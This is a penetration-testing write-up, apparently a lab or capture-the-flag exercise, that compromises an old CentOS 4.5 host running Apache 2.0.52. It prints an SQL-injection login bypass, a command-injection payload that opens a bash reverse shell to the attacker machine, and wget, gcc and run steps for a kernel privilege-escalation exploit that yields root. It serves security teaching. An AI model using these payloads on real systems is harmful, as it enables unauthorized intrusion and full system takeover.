渗透测试报告针对目标系统192.168.133.142(CentOS 4.5)发现多处严重漏洞:Apache 2.0.52存在拒绝服务、缓冲溢出及远程代码执行风险;登录页面SQL注入可绕过认证;Web应用命令注入允许远程执行。通过反向shell获取apache权限后利用本地提权exploit成功获取root权限。 2025-9-13 07:48:58 Author: infosecwriteups.com(查看原文) 阅读量:3 收藏
Press enter or click to view image in full size
Penetration Testing Report
Target System: 192.168.133.142
Operating System: CentOS release 4.5 (Final)
Reconnaissance & Network Scanning
Tool Used: arp-scan
Command:
sudo arp-scan -lPress enter or click to view image in full size
Findings:
Discovered the target machine on the local network:
- IP: 192.168.133.142
Port Scanning & Service Enumeration
Tool Used: nmap
Command:
nmap -sV -O 192.168.133.142Results:
Press enter or click to view image in full size
OS Identified: Linux 2.6.X (CentOS 4.5)
Vulnerability Research
Tool Used: Searchsploit
Command:
searchsploit Apache 2.0.52Press enter or click to view image in full size
Findings:
- Apache 2.0.52 has known vulnerabilities, including:
- GET Denial of Service
- mod_ssl buffer overflows
- Remote Code Execution (via various vectors)
Web Application Testing
1. Login Page SQL Injection
Observed Page: Remote System Administration Login
Payload Used:
Username: admin'--
Password: (blank)Result: Successful login → indicates SQL Injection vulnerability
Press enter or click to view image in full size
2. Command Injection
Observed Page: Ping utility
Vulnerability: Input not sanitized → allows command injection
Gaining Shell Access (Reverse Shell)
Listener Setup:
nc -nlvp 3000Command Injection Used (via ping form or web shell):
192.168.133.140;bash -i >& /dev/tcp/192.168.133.140/3000 0>&1Press enter or click to view image in full size
Result: Reverse shell established as:
id
# uid=48(apache) gid=48(apache) groups=48(apache)Privilege Escalation
System Info:
cat /etc/*-release
# CentOS release 4.5 (Final)open server using python :
python -m http.server 80Press enter or click to view image in full size
Exploit Used: Exploit code 9542.c (likely kernel local privilege escalation)
Steps:
cd /var/tmp/
wget http://192.168.133.140:80/9542.c
gcc 9542.c -o exploit
chmod 777 exploit
./exploitPress enter or click to view image in full size
Result:
id
# uid=0(root) gid=0(root) groups=48(apache)🟢 Root shell successfully obtained.
Conclusion
The penetration test against the target machine 192.168.133.142 successfully demonstrated multiple critical security weaknesses that could be exploited by an attacker to gain full control of the system.
Key conclusions:
- The system is running outdated and vulnerable software, specifically CentOS 4.5 and Apache 2.0.52, which are known to have several publicly available exploits.
- A SQL Injection vulnerability in the login form allowed bypassing authentication without valid credentials.
- A command injection flaw in the ping functionality of the web application allowed remote command execution.
- Using these vulnerabilities, we successfully gained a reverse shell with
apacheuser privileges. - Finally, a local privilege escalation exploit (compiled and executed on the target) granted root-level access, completely compromising the machine.
✅ Root access obtained: Full system compromise.
如有侵权请联系:admin#unsafe.sh